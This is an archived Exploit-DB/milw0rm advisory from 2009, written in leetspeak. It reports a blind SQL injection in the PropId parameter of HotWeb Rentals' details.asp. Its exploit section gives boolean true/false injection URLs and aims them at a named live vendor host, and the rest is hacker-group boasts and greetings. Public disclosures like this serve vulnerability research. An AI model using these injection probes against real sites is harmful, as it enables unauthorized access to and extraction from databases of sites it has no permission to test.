HotWeb Rentals - 'details.asp?PropId' Blind SQL Injection

EDB-ID:

9675


Platform:

ASP

Published:

2009-09-15

 [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
[☠]
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[☠]
[~] Vendor: www.hotwebscripts.co.uk
[☠]
[☠] Software: HotWeb Rentals 
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 15.2.2009
[☠]
[☠] Home: CL053D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠

[☠] ERR0R CONSOLE

WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)

[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L

[☠] Exploit:

[☠] TRU3 : details.asp?PropId=1+and+1=1


 [☠] FALS3 : details.asp?PropId=1+and+1=2

[☠]liv3 3xpL0!T:
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2


 [☠]

N073:
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))

4R48!4N-HACK3R!!القراصنه العرب

 [~]-----------------------------{str0ke}-----------------------------------------------------

[~] Greetz tO: {str0ke} & XP_10 & روت شيل & ابو شهد & B0rN 2 K!LL & JUPA &D3V!L-FUCK3R & الزهيري
 [~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y  

 [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''

[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007

  [~]spechial FR!ND: 74M3M تميم

[~] !'M 4R48!4N 3XPL0!73R.

  [~]

[~]--------------------------------------------------------------------------------

# milw0rm.com [2009-09-15]